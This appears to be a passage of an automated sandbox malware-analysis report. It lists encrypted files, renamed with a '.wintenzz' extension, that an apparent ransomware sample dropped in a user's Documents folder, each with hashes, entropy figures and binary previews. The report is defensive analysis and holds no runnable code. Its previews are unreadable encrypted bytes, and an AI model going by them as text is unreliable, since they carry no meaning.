Preview:	................ebXArjdYgGdCbqczCjdU3wLc.........,x;...VU...a.H...W.t.19..ROk.K.W?vGG..By.X..+3.T.C..=f.A....F../.].%.......l..$..\|n..q..#.D...sN.-.g3.<..m.?...._Q..1..u..{.C)...... ..... .}!I..]6O8(.E5.a._..D.D...>.)._&....P.{.....G.ba.~6s..es>...B>...U.>..!{..PQMz..<Cf.r..[..i4)O......84..B...$y...~bz..\|.....(T..Y/&.&......Yf.e!..#....a..r..O..t#<.....?.+.b.>.`.K......_.1.l....(..Gd...^.....X^..l$......Kp...Q[`......Hs..2.Z..X+9ws.....T.H..xnH1ZfY.......(...M(....7.2O.\|@....,.x.h\<.n.......'...B....9(.v.(....b%.>.....q........+-g......L.>.&.}LLzgH..2.....r.{.P.....-..Z.Q.V.....f.........fc?.....$0....o.3.._.!...H...Zm..>Sx.1...."J...\)....`.......)...h.nOQ.&......vK[a...$...p.Q.$.$..D#.L4?..F.u.-....0.;..4.N.6U..5.....w.....F.8n.d......(Y..i.U.%.E.~....w~.[....L..}k....s.e.."....XY+......wa.GW........D..u..QlO..a#.`...s.Jq.VW.n..,.G...hq..=j.....\|@J..%T&y*..c...k..5S.8-.....u+Ib.0.>.T..)b.......t......URy..U~.o

C:\Users\user\Documents\BWDRWEEARI.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.790791647402939
Encrypted:	false
SSDEEP:	24:52zlgYQSeyWfXLrfyy7l/UTdqWowR/gIDHlgRdgPij8E:QBgxzDShou1HlUmI
MD5:	315543CD9F263D2091F38DE9957824F5
SHA1:	B9C6B7BF7C121E1F2E9318BD60C3117FB921F1C4
SHA-256:	28F6BADFB8CBDF8EFA313A3A77E55677500CC67A1654EF6A9C28FA5A5445EC38
SHA-512:	13B36EF8387FE5B2B1239F25EC7A6EE18DFADC4E0C3B23A2DC0EA8333E27FDDE4C22BE02C402B9202EA8259C1AE0B2FDE8DA424D81A77E22A55AD0E9AC1BD11C
Malicious:	false
Preview:	................ebXArjdYgGdCbqczCjdU3wLc.........,x;...VU...a.H...W.t.19..ROk.K.W?vGG..By.X..+3.T.C..=f.A....F../.].%.......l..$..\|n..q..#.D...sN.-.g3.<..m.?...._Q..1..u..{.C)...... ..... .}!I..]6O8(.E5.a._..D.D...>.)._&....P.{.....G.ba.~6s..es>...B>...U.>..!{..PQMz..<Cf.r..[..i4)O......84..B...$y...~bz..\|.....(T..Y/&.&......Yf.e!..#....a..r..O..t#<.....?.+.b.>.`.K......_.1.l....(..Gd...^.....X^..l$......Kp...Q[`......Hs..2.Z..X+9ws.....T.H..xnH1ZfY.......(...M(....7.2O.\|@....,.x.h\<.n.......'...B....9(.v.(....b%.>.....q........+-g......L.>.&.}LLzgH..2.....r.{.P.....-..Z.Q.V.....f.........fc?.....$0....o.3.._.!...H...Zm..>Sx.1...."J...\)....`.......)...h.nOQ.&......vK[a...$...p.Q.$.$..D#.L4?..F.u.-....0.;..4.N.6U..5.....w.....F.8n.d......(Y..i.U.%.E.~....w~.[....L..}k....s.e.."....XY+......wa.GW........D..u..QlO..a#.`...s.Jq.VW.n..,.G...hq..=j.....\|@J..%T&y*..c...k..5S.8-.....u+Ib.0.>.T..)b.......t......URy..U~.o

C:\Users\user\Documents\BXAJUJAOEO.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.751364146164549
Encrypted:	false
SSDEEP:	24:MAhSX3lkqvhyZpt9M2jCIVbL6Vf2yQXgHdrXX2B2obLlW:A+qvhyZu2Jb2Vf2jOdrXX2wGpW
MD5:	55516007AF75AEC34987C35216B71279
SHA1:	7CC119F91C5CF6D6F3A4A71298209F5EDF339E49
SHA-256:	020F6A1188A349923DDCD79D48E0346D3BDB403F8F9B5F417FFE07B3CE7B2C6D
SHA-512:	97D9EF7BA17BE959E9BA4A3D39870F1ECBD0EC6CD670A5786F88E023F4F3224A7096DCBFE4D13541FD69408FEFC7D596EA14A1B9F0FA415682882711DB7543A3
Malicious:	false
Preview:	................7lIYdubMXdmtC5nao7lCIcpl.........sB.sp4.....?O..~.....@U..z....F..O.]9$.........t.........-.y....].n+..I..d<.n..)Uz.A..&.....E..k<s.N.3..6-.....$@{.........&.._!.c..._.....XY.\.!.A.^..xV..TL.....O%..l..:.(...uQrN;..b.'F~D..]..+....A..`..0.1;..zJ.~.....N..Y....x..~.a......pk.2..^e1.i.qR./.....E.'.s..qiF......Y[o.3.-...W~....8....\N]j.w.N.t..FT)$$.PZ..?.g..1./.........E_....M../..+.....F.e.R..Z.pw...q.=..-.,6....'.>...+qSl..{..vV...C.....q....v.\|..<'".C>.2U.C...83..b;`.}i.\|1..i......2...2.=....>.....im=.!../P..yL..;....V.......U.l.A.+.{..Pm......J.n....+.(..u.-`.I.x.P..r...C.m........p.c?...k..d.b{...7..&...a.S....'.m.@..r.....n....P..`7......u#....on.IO..4!..`<...wy>..-.l..az.C.............nY.{..Qj..e..c.K.s.@...._..........T.}.O.NY.....Y.M.I......M.u.q.ZF.l`.b...Y.D.d.D..bnJ_.~..Y{:....yw.t..(~/.....1A.e.,...+.+.9.:.r...4..V.Z..D.Q.*.P.F.f..Y.....g.N.hC]........c......}.....~.n=...g.U.t$q.}I..%...g.....t...HC...?K...

C:\Users\user\Documents\BXAJUJAOEO.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.751364146164549
Encrypted:	false
SSDEEP:	24:MAhSX3lkqvhyZpt9M2jCIVbL6Vf2yQXgHdrXX2B2obLlW:A+qvhyZu2Jb2Vf2jOdrXX2wGpW
MD5:	55516007AF75AEC34987C35216B71279
SHA1:	7CC119F91C5CF6D6F3A4A71298209F5EDF339E49
SHA-256:	020F6A1188A349923DDCD79D48E0346D3BDB403F8F9B5F417FFE07B3CE7B2C6D
SHA-512:	97D9EF7BA17BE959E9BA4A3D39870F1ECBD0EC6CD670A5786F88E023F4F3224A7096DCBFE4D13541FD69408FEFC7D596EA14A1B9F0FA415682882711DB7543A3
Malicious:	false
Preview:	................7lIYdubMXdmtC5nao7lCIcpl.........sB.sp4.....?O..~.....@U..z....F..O.]9$.........t.........-.y....].n+..I..d<.n..)Uz.A..&.....E..k<s.N.3..6-.....$@{.........&.._!.c..._.....XY.\.!.A.^..xV..TL.....O%..l..:.(...uQrN;..b.'F~D..]..+....A..`..0.1;..zJ.~.....N..Y....x..~.a......pk.2..^e1.i.qR./.....E.'.s..qiF......Y[o.3.-...W~....8....\N]j.w.N.t..FT)$$.PZ..?.g..1./.........E_....M../..+.....F.e.R..Z.pw...q.=..-.,6....'.>...+qSl..{..vV...C.....q....v.\|..<'".C>.2U.C...83..b;`.}i.\|1..i......2...2.=....>.....im=.!../P..yL..;....V.......U.l.A.+.{..Pm......J.n....+.(..u.-`.I.x.P..r...C.m........p.c?...k..d.b{...7..&...a.S....'.m.@..r.....n....P..`7......u#....on.IO..4!..`<...wy>..-.l..az.C.............nY.{..Qj..e..c.K.s.@...._..........T.}.O.NY.....Y.M.I......M.u.q.ZF.l`.b...Y.D.d.D..bnJ_.~..Y{:....yw.t..(~/.....1A.e.,...+.+.9.:.r...4..V.Z..D.Q.*.P.F.f..Y.....g.N.hC]........c......}.....~.n=...g.U.t$q.}I..%...g.....t...HC...?K...

C:\Users\user\Documents\BXAJUJAOEO\BQJUWOYRTO.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.819269950761014
Encrypted:	false
SSDEEP:	24:vAzCx2jEW5uWudAdmt7zOPZb/6Dp2Hxsmt2BayZo1XpYM+EkpChoFnIDvyszm:IzaMBwAu7zkh/Cp2Rx2gpvVoFnIms6
MD5:	1FFE69B0B7D353531F558C356F1ADCF1
SHA1:	7BA1810925434C7995D38B789C17A5F71EC57568
SHA-256:	8E6356C14B165B5AA4FF10FB1F43CDDD6F33E590429831FE104B3061BB2D8D4A
SHA-512:	9DFD3190A59FEE360F7B71FB0AEF398582E9C0A029510FE989329237E6975A70F50E0E44798F3EC6667EC782FEE0151EB146EBC2E59C06F1DABFD89B20A16215
Malicious:	false
Preview:	................9zCpkkzff6CYn9pUnJmFau4H........ln.......g............H.........;.86.e...q&..`.aX.G.....hP.L.i..;.QJ%Y...w...<+...,.<L...5..X.JX\@EwUdjS..E.@..D.E..{.#.]9..p..b...4.......~...S.-.A....MSf...4s...-.........A^h.[.........n.[.....lE..P......s.@.k.Q\^.bc.t....8.......aO..$.......l...P./.).....t...h.?`,qV....v..>..........k...U....LI.J..@......s......p.c..:.^.[2..@.c}...t?g.]f..M.@.A1!....A...v.@...]Z....V\eT.....^<vo..Z.G....,@.P..=...I..WD....z.~H......!..#......J....3i...T..gp..\..M,...R..#....oQ.A..._...D.....h.3.".....,..EqhDO...L.@..k. ....3....j-..p....{.6.X[m..VS.M...m.qF"\....x...J._...x.c. I...D$S9F.z.$.Kh..n...}.Vw).R...\M..D.....!.X[...U,..o....%.L.;.w...Y.bj6..f$.`KW.E...@...u...1......e"G..S._j....A.Nb.E.9]-..M.0..N.>. e...d..D..rTer......2.......{d.X.?.(..4.Tc[UZ......=P..$.P.M...u..5t/..&..\|....V..5....&Fp&..+..V.....4...i......2^.=..0.siE.k.g5..[..C.<U..O.............A.j..,...Y.a.......o^u.ew%.t.M.....{..Q.G..j..t.

C:\Users\user\Documents\BXAJUJAOEO\BQJUWOYRTO.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.819269950761014
Encrypted:	false
SSDEEP:	24:vAzCx2jEW5uWudAdmt7zOPZb/6Dp2Hxsmt2BayZo1XpYM+EkpChoFnIDvyszm:IzaMBwAu7zkh/Cp2Rx2gpvVoFnIms6
MD5:	1FFE69B0B7D353531F558C356F1ADCF1
SHA1:	7BA1810925434C7995D38B789C17A5F71EC57568
SHA-256:	8E6356C14B165B5AA4FF10FB1F43CDDD6F33E590429831FE104B3061BB2D8D4A
SHA-512:	9DFD3190A59FEE360F7B71FB0AEF398582E9C0A029510FE989329237E6975A70F50E0E44798F3EC6667EC782FEE0151EB146EBC2E59C06F1DABFD89B20A16215
Malicious:	false
Preview:	................9zCpkkzff6CYn9pUnJmFau4H........ln.......g............H.........;.86.e...q&..`.aX.G.....hP.L.i..;.QJ%Y...w...<+...,.<L...5..X.JX\@EwUdjS..E.@..D.E..{.#.]9..p..b...4.......~...S.-.A....MSf...4s...-.........A^h.[.........n.[.....lE..P......s.@.k.Q\^.bc.t....8.......aO..$.......l...P./.).....t...h.?`,qV....v..>..........k...U....LI.J..@......s......p.c..:.^.[2..@.c}...t?g.]f..M.@.A1!....A...v.@...]Z....V\eT.....^<vo..Z.G....,@.P..=...I..WD....z.~H......!..#......J....3i...T..gp..\..M,...R..#....oQ.A..._...D.....h.3.".....,..EqhDO...L.@..k. ....3....j-..p....{.6.X[m..VS.M...m.qF"\....x...J._...x.c. I...D$S9F.z.$.Kh..n...}.Vw).R...\M..D.....!.X[...U,..o....%.L.;.w...Y.bj6..f$.`KW.E...@...u...1......e"G..S._j....A.Nb.E.9]-..M.0..N.>. e...d..D..rTer......2.......{d.X.?.(..4.Tc[UZ......=P..$.P.M...u..5t/..&..\|....V..5....&Fp&..+..V.....4...i......2^.=..0.siE.k.g5..[..C.<U..O.............A.j..,...Y.a.......o^u.ew%.t.M.....{..Q.G..j..t.

C:\Users\user\Documents\BXAJUJAOEO\BXAJUJAOEO.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.7858374915313835
Encrypted:	false
SSDEEP:	24:ukCXioLJfptI9a/5Zbhk2FAt3nO7hodPY4dCw7tb4kDuOVCUScmCQ:ukCX3ptlFk2FKO7qVY4dCwJ0kDIcDQ
MD5:	365330C299DC180E5A828BD91A2F506E
SHA1:	24112D3D9F6005D989DAD03E57C048B153445E0F
SHA-256:	1D599829F0F0EA7978A77A1CE4C3DF55AE4A7044CD483975855F4544B61A7D01
SHA-512:	323687F4A45B05EEFF3E4F3201EF22411974BAD1F953AF21715EB3873A1194A182C499726E8FB2D716D893415B9B6D1FB81CD1A9771CD035D8EE487705EEABD0
Malicious:	false
Preview:	................y0A5PefFnyVNXAxUSbogMJUP..........3;D..h..].nw..G.P.a.%...z.5~. .4......,....Q.:.'a.......n"i..!...d@.hU.i....@.0...5........!}+.3..d....._...._..?#,..%./...5>..^..l..b.(.${.....T...u+....C...Z.........Q.../...$.&u.a......"$s..wJ[.....V....@..l.....g....aT.u.G..3.....C.\|.k.........J..b,Y.B........Z..&'...?z..T?.x.,.=>.^.bUCw.c..c..F..P...p...E...;....J.7#.........h^vw..%..E}.T.8.E..Q...~.....O4..;..x.9.yA..Y..W;...#Qp.XD.q. ;<K....xl'.....l.\^.N..^.4CN.8..b...G.$.UH(.K.L..r....zV.5l..S)....9k../......^....Z....'... ..E{...pH."......>...0g..M...Gv.{..Y.....T...3.0d.cP.....;.-....B.f.h.^.m.2..Mz.@..W.0K..%...t..2;......_.r;.]...A.....'..>JXe..r.P.\....(I..aq..S.L.oH.s.\|...r.vQ=:.t.M..y>.....6~\|t..6Y4....b.K.... .3n.....2pa.`..C/....'.7.m.)..h...{?C%e.>..h.5..5...lw........'.......DQJ..r.\4..M...K.0k.Z.R.7....y..#..H.x.\|.lLE..).).......m.H.W........)..&{.%.....P.F....Kq....V...)..?..[.......>.w\.....B.C\Q...a..aac.

C:\Users\user\Documents\BXAJUJAOEO\BXAJUJAOEO.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.7858374915313835
Encrypted:	false
SSDEEP:	24:ukCXioLJfptI9a/5Zbhk2FAt3nO7hodPY4dCw7tb4kDuOVCUScmCQ:ukCX3ptlFk2FKO7qVY4dCwJ0kDIcDQ
MD5:	365330C299DC180E5A828BD91A2F506E
SHA1:	24112D3D9F6005D989DAD03E57C048B153445E0F
SHA-256:	1D599829F0F0EA7978A77A1CE4C3DF55AE4A7044CD483975855F4544B61A7D01
SHA-512:	323687F4A45B05EEFF3E4F3201EF22411974BAD1F953AF21715EB3873A1194A182C499726E8FB2D716D893415B9B6D1FB81CD1A9771CD035D8EE487705EEABD0
Malicious:	false
Preview:	................y0A5PefFnyVNXAxUSbogMJUP..........3;D..h..].nw..G.P.a.%...z.5~. .4......,....Q.:.'a.......n"i..!...d@.hU.i....@.0...5........!}+.3..d....._...._..?#,..%./...5>..^..l..b.(.${.....T...u+....C...Z.........Q.../...$.&u.a......"$s..wJ[.....V....@..l.....g....aT.u.G..3.....C.\|.k.........J..b,Y.B........Z..&'...?z..T?.x.,.=>.^.bUCw.c..c..F..P...p...E...;....J.7#.........h^vw..%..E}.T.8.E..Q...~.....O4..;..x.9.yA..Y..W;...#Qp.XD.q. ;<K....xl'.....l.\^.N..^.4CN.8..b...G.$.UH(.K.L..r....zV.5l..S)....9k../......^....Z....'... ..E{...pH."......>...0g..M...Gv.{..Y.....T...3.0d.cP.....;.-....B.f.h.^.m.2..Mz.@..W.0K..%...t..2;......_.r;.]...A.....'..>JXe..r.P.\....(I..aq..S.L.oH.s.\|...r.vQ=:.t.M..y>.....6~\|t..6Y4....b.K.... .3n.....2pa.`..C/....'.7.m.)..h...{?C%e.>..h.5..5...lw........'.......DQJ..r.\4..M...K.0k.Z.R.7....y..#..H.x.\|.lLE..).).......m.H.W........)..&{.%.....P.F....Kq....V...)..?..[.......>.w\.....B.C\Q...a..aac.

C:\Users\user\Documents\BXAJUJAOEO\DQOFHVHTMG.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.796741728327378
Encrypted:	false
SSDEEP:	24:ehopjvYTbfvkrFbN0md4mtEcLeUQcsz6F7/63vHiMrRADMIu5qi:eibYfGWQBeUk6F7/UvH3RAg+i
MD5:	B48FEE2119CA008AA11723EA624AC8C0
SHA1:	7EAE966F4431D461A36DE11B3EE4627A7BED3C8B
SHA-256:	58F399CDC16537A23AACC3363FF03CE0FBA01BC4D551A7803C5A6D323576FAD1
SHA-512:	4C6718573691ED65E7C6DFE10D41B603864CBCF58F2A4B30802BFE237CBE8E17B36A3433030193CCA03D4837876500BC5618F964451B4E625EAA58C8029C06D9
Malicious:	false
Preview:	................PsMsEFQESimJIbekNn9iV3br..........:..8...V.......$.....DVw.4^.\|F{...g.!&.h.R.F.d.......E...^........&XIn.G..o..S.p..>~....3.bj..W^hJ.G..4L7"..F.....Tf.pT.QgD........M..o...`......).c..r.j..`....L$.'6.omc.W..6.-k...)...+.7Gt'..l....N..{y....<.\|.e..M..`u.!k....!..:/.....O.......)`.oAx.y.5...d,/G.Au...2Qs...=xt...R..a.W.Z.x.X6.r(oJP....>...l"~N...b..4.N....\|.......g%j.......]RhuV..;....kb. .y.9c...T5j.j.KrZ/Q.K.....m.I..!....`.\OfU%......2.*..G-Q.1.d.(&.... U....V.%.ZdK.S:.\|.8U..d!.L\8..f.k.q....&...T.HI[1bs\|+...,{/.A.....D'4..#.^.s+.........h.....".`..!@$z...6.IY.W.r...O$..P..\.8...."@..G..mH.....s.v.O..7...=..!........(....\.l#..#.zFV.@u.C=4...I.H....l...(..s]..3D.G..I.i[....-..ML....@,P........u;...7#....>.2.z.....&.!.......}...r..............-.J.... ...........}.D&Q...."..;..L.0. \|..#.q(.ST.dk.)...Mr.~.;0.......:..W..p..B..O......Q(.+_....g=f..\|&..>..OZ...WGP.#......KM.....;U.......;.....1.3.{..C..LQ..W.g.R9..0

C:\Users\user\Documents\BXAJUJAOEO\DQOFHVHTMG.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.796741728327378
Encrypted:	false
SSDEEP:	24:ehopjvYTbfvkrFbN0md4mtEcLeUQcsz6F7/63vHiMrRADMIu5qi:eibYfGWQBeUk6F7/UvH3RAg+i
MD5:	B48FEE2119CA008AA11723EA624AC8C0
SHA1:	7EAE966F4431D461A36DE11B3EE4627A7BED3C8B
SHA-256:	58F399CDC16537A23AACC3363FF03CE0FBA01BC4D551A7803C5A6D323576FAD1
SHA-512:	4C6718573691ED65E7C6DFE10D41B603864CBCF58F2A4B30802BFE237CBE8E17B36A3433030193CCA03D4837876500BC5618F964451B4E625EAA58C8029C06D9
Malicious:	false
Preview:	................PsMsEFQESimJIbekNn9iV3br..........:..8...V.......$.....DVw.4^.\|F{...g.!&.h.R.F.d.......E...^........&XIn.G..o..S.p..>~....3.bj..W^hJ.G..4L7"..F.....Tf.pT.QgD........M..o...`......).c..r.j..`....L$.'6.omc.W..6.-k...)...+.7Gt'..l....N..{y....<.\|.e..M..`u.!k....!..:/.....O.......)`.oAx.y.5...d,/G.Au...2Qs...=xt...R..a.W.Z.x.X6.r(oJP....>...l"~N...b..4.N....\|.......g%j.......]RhuV..;....kb. .y.9c...T5j.j.KrZ/Q.K.....m.I..!....`.\OfU%......2.*..G-Q.1.d.(&.... U....V.%.ZdK.S:.\|.8U..d!.L\8..f.k.q....&...T.HI[1bs\|+...,{/.A.....D'4..#.^.s+.........h.....".`..!@$z...6.IY.W.r...O$..P..\.8...."@..G..mH.....s.v.O..7...=..!........(....\.l#..#.zFV.@u.C=4...I.H....l...(..s]..3D.G..I.i[....-..ML....@,P........u;...7#....>.2.z.....&.!.......}...r..............-.J.... ...........}.D&Q...."..;..L.0. \|..#.q(.ST.dk.)...Mr.~.;0.......:..W..p..B..O......Q(.+_....g=f..\|&..>..OZ...WGP.#......KM.....;U.......;.....1.3.{..C..LQ..W.g.R9..0

C:\Users\user\Documents\BXAJUJAOEO\LHEPQPGEWF.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.7904261631440015
Encrypted:	false
SSDEEP:	24:Jg0q5eTawkj073GhTUlFJF+lajJDDMIp5qL2MBYc5:0eWwkI73GhTmPFdGGN+5
MD5:	C699F2B3C12C353D8A63594C834CFE60
SHA1:	BE83E234B2166DBF913EFB420FA6495DE7F6B18D
SHA-256:	4F39DDD2FD2F3FEE2C9082AFEB0DB165BDCA59450AE5308E5514554402DD6603
SHA-512:	1074E727D434D22F2A8BE151FEE2B797ED218E0626F21C4D38D7ABF081C2CB02FE4472B25A7B6986FB6B133860DD89F81C430EB2F07EF630A3CB99F8AC641C24
Malicious:	false
Preview:	................hvtHCoxbDXdE6vK7HcZeHyNP.........];&9.6..,}'....=.......BC..Z9r..^<...M..K......G!u...!......Z.>.....D>dZ..,M.~....k......Hz.v.W#.7...3.i.C.f..a'Lq..mQ..o..../.?.B..;..t.Z. +_\|.n8.kl;2...p..6...E..;y.....f..3.H..p..j.n..........+..Ul6L20zS...y.o~.e...Gdw...N\$o..d.:L...h>X..>.....6....1n.....9.....p.<.N.C..Q......So...5.../..a..I....\LC.y.x).r..XB..\.x.zd.4...0.yT.8.8..:X...4G\|:..s`7y...}q........1.......x$A..S%]X.+..Z."@\J4.>F...a.t]M.!h.z[...j/...._#.Y.<0....g!...t..R.C..^.?..e.....0.7.......^...%G....xF.^yo..)...Y."D......s~9j.e......D...}......1.^N..jFir.f....2..o6..4...B..`..a.,.]...k.i....E(..!...6...x........5.....RP{I.......TT.#.%.!N...vm...@:#.o..k.._.Z.d%.....R.5L.l.6.\|+....V.I..8.q.w.1.GT.pH......(>.........w.,.'...........}..W.1.>6.@...C...._..'1S..Q..t.uiiiD...X.j2.~.^+}q.V........._..T.A2.7.Z.. Q.z..EO...........,.i.....c.l.Y..P.'.#>.N.L.c..]......3...0..%D...<)...y........... H.h.....m...."..#.B.e,6..a....tX je.

C:\Users\user\Documents\BXAJUJAOEO\LHEPQPGEWF.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.7904261631440015
Encrypted:	false
SSDEEP:	24:Jg0q5eTawkj073GhTUlFJF+lajJDDMIp5qL2MBYc5:0eWwkI73GhTmPFdGGN+5
MD5:	C699F2B3C12C353D8A63594C834CFE60
SHA1:	BE83E234B2166DBF913EFB420FA6495DE7F6B18D
SHA-256:	4F39DDD2FD2F3FEE2C9082AFEB0DB165BDCA59450AE5308E5514554402DD6603
SHA-512:	1074E727D434D22F2A8BE151FEE2B797ED218E0626F21C4D38D7ABF081C2CB02FE4472B25A7B6986FB6B133860DD89F81C430EB2F07EF630A3CB99F8AC641C24
Malicious:	false
Preview:	................hvtHCoxbDXdE6vK7HcZeHyNP.........];&9.6..,}'....=.......BC..Z9r..^<...M..K......G!u...!......Z.>.....D>dZ..,M.~....k......Hz.v.W#.7...3.i.C.f..a'Lq..mQ..o..../.?.B..;..t.Z. +_\|.n8.kl;2...p..6...E..;y.....f..3.H..p..j.n..........+..Ul6L20zS...y.o~.e...Gdw...N\$o..d.:L...h>X..>.....6....1n.....9.....p.<.N.C..Q......So...5.../..a..I....\LC.y.x).r..XB..\.x.zd.4...0.yT.8.8..:X...4G\|:..s`7y...}q........1.......x$A..S%]X.+..Z."@\J4.>F...a.t]M.!h.z[...j/...._#.Y.<0....g!...t..R.C..^.?..e.....0.7.......^...%G....xF.^yo..)...Y."D......s~9j.e......D...}......1.^N..jFir.f....2..o6..4...B..`..a.,.]...k.i....E(..!...6...x........5.....RP{I.......TT.#.%.!N...vm...@:#.o..k.._.Z.d%.....R.5L.l.6.\|+....V.I..8.q.w.1.GT.pH......(>.........w.,.'...........}..W.1.>6.@...C...._..'1S..Q..t.uiiiD...X.j2.~.^+}q.V........._..T.A2.7.Z.. Q.z..EO...........,.i.....c.l.Y..P.'.#>.N.L.c..]......3...0..%D...<)...y........... H.h.....m...."..#.B.e,6..a....tX je.

C:\Users\user\Documents\BXAJUJAOEO\NIRMEKAMZH.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.825365916746988
Encrypted:	false
SSDEEP:	24:zHugSCtuLTCrGG3Cfo/v0Rffji85zvkNIf13qmbHQdAmdL3CWBXxt:z+MuLTCrmWa55zvOIJ1b6Ampymt
MD5:	A1CAEABB0BD7685546D8F8274B01F604
SHA1:	2C92B9CDCF28EBECA83F2EFEF9E1CBBA52B98059
SHA-256:	EA22F87F34C83D69FB027E893B4C16CEE75752B9A4B92F3F786C2F224333B5FD
SHA-512:	0FECD1A76B4729CD91C388FD133F91CF192C97E9F69BA0AD2F2C2D6F27E69D0C80F45931A80E22E82E754970696CB45BE6A6AB86ADB433257DA871CD26C9B579
Malicious:	false
Preview:	................OhIFiqjVLCJvptEU1d7NJu0b...........a1.L....S{.3..=.8.(..:.CG%...'E H.g.q.8....i.l.\|9.....;..j.~w.G8/]Z..,.....5A.".p.]e."".zgWBC.=..+d.nU..wXq..o.px....-.9...y6......\.<.[...5.!.=.[\|W..j.....=".WG^.}M..1 .i....6.....".GV....5;.\|.>.8.8=.r.....97>QN..P....b..l<...+..[;,n.?.2g.u..@....7W'...%.1..i?.81..K.7,....k64.A..5.z..X\|..2...'..@[.[Gf.............j..R.[DX..=$4E..C.nX4.lZi......q.#...h?...a9e<d....%..=+]".....(...Dc.sX......;M...3/...h.4.C...4.T.7e...@B....'Wo.c.)D.c.s.1..2.$x..]...4.j..k.7.nGk.4.Z...^%.,..Zt...1....oBoU~.F...sY.x.!.y..{...L...7.r.\...S....2..... qt..6...v....#.X...,...a.0.....V...m........6nf.'(.?8..YSd.._I1U..,.G...$..8.F!...C......C.g[.. .9E...C..G.3......Z-.Z.#fg..W[P.pR&..3.I......`....x.v..q.2{...v.Ga.5_..!.!&..d0.Z2D.Z.MT.....8.[.Q..\.Od...?AX....gMg..........+.\.....=f,.h.F..5h...w@.......@`..[.._.>......VA.=..Y....J..!...t......:6.....W.$2-...N.4.. ......v....V.........9..........+..-...\|.cH..2b..W.M~.\

C:\Users\user\Documents\BXAJUJAOEO\NIRMEKAMZH.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.825365916746988
Encrypted:	false
SSDEEP:	24:zHugSCtuLTCrGG3Cfo/v0Rffji85zvkNIf13qmbHQdAmdL3CWBXxt:z+MuLTCrmWa55zvOIJ1b6Ampymt
MD5:	A1CAEABB0BD7685546D8F8274B01F604
SHA1:	2C92B9CDCF28EBECA83F2EFEF9E1CBBA52B98059
SHA-256:	EA22F87F34C83D69FB027E893B4C16CEE75752B9A4B92F3F786C2F224333B5FD
SHA-512:	0FECD1A76B4729CD91C388FD133F91CF192C97E9F69BA0AD2F2C2D6F27E69D0C80F45931A80E22E82E754970696CB45BE6A6AB86ADB433257DA871CD26C9B579
Malicious:	false
Preview:	................OhIFiqjVLCJvptEU1d7NJu0b...........a1.L....S{.3..=.8.(..:.CG%...'E H.g.q.8....i.l.\|9.....;..j.~w.G8/]Z..,.....5A.".p.]e."".zgWBC.=..+d.nU..wXq..o.px....-.9...y6......\.<.[...5.!.=.[\|W..j.....=".WG^.}M..1 .i....6.....".GV....5;.\|.>.8.8=.r.....97>QN..P....b..l<...+..[;,n.?.2g.u..@....7W'...%.1..i?.81..K.7,....k64.A..5.z..X\|..2...'..@[.[Gf.............j..R.[DX..=$4E..C.nX4.lZi......q.#...h?...a9e<d....%..=+]".....(...Dc.sX......;M...3/...h.4.C...4.T.7e...@B....'Wo.c.)D.c.s.1..2.$x..]...4.j..k.7.nGk.4.Z...^%.,..Zt...1....oBoU~.F...sY.x.!.y..{...L...7.r.\...S....2..... qt..6...v....#.X...,...a.0.....V...m........6nf.'(.?8..YSd.._I1U..,.G...$..8.F!...C......C.g[.. .9E...C..G.3......Z-.Z.#fg..W[P.pR&..3.I......`....x.v..q.2{...v.Ga.5_..!.!&..d0.Z2D.Z.MT.....8.[.Q..\.Od...?AX....gMg..........+.\.....=f,.h.F..5h...w@.......@`..[.._.>......VA.=..Y....J..!...t......:6.....W.$2-...N.4.. ......v....V.........9..........+..-...\|.cH..2b..W.M~.\

C:\Users\user\Documents\BXAJUJAOEO\PWZOQIFCAN.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.778196134280676
Encrypted:	false
SSDEEP:	24:xL0rjKwbnwP1848NND65gteJGunODAXSr9CvBMCPUlOFtMa//:xClwcb2RADAXqkSCPUlOFt//
MD5:	13C45C73AE255A57D4B864F56CDD96C0
SHA1:	B44AA3F560E9C12C9816731FA113D75F79030B1A
SHA-256:	59B843930B8594A97F01F5EEEED4106763C5225957B82548FD07522BE5116114
SHA-512:	52FC76DFD9CA9EDBA5A34F921F2D1E5E791412A0587757911DAD15BC7D9F42DDFEC7FF0E82448A95060B0258B5B2A49FCD9F5D627E56B2A9039522F8F5A19DBE
Malicious:	false
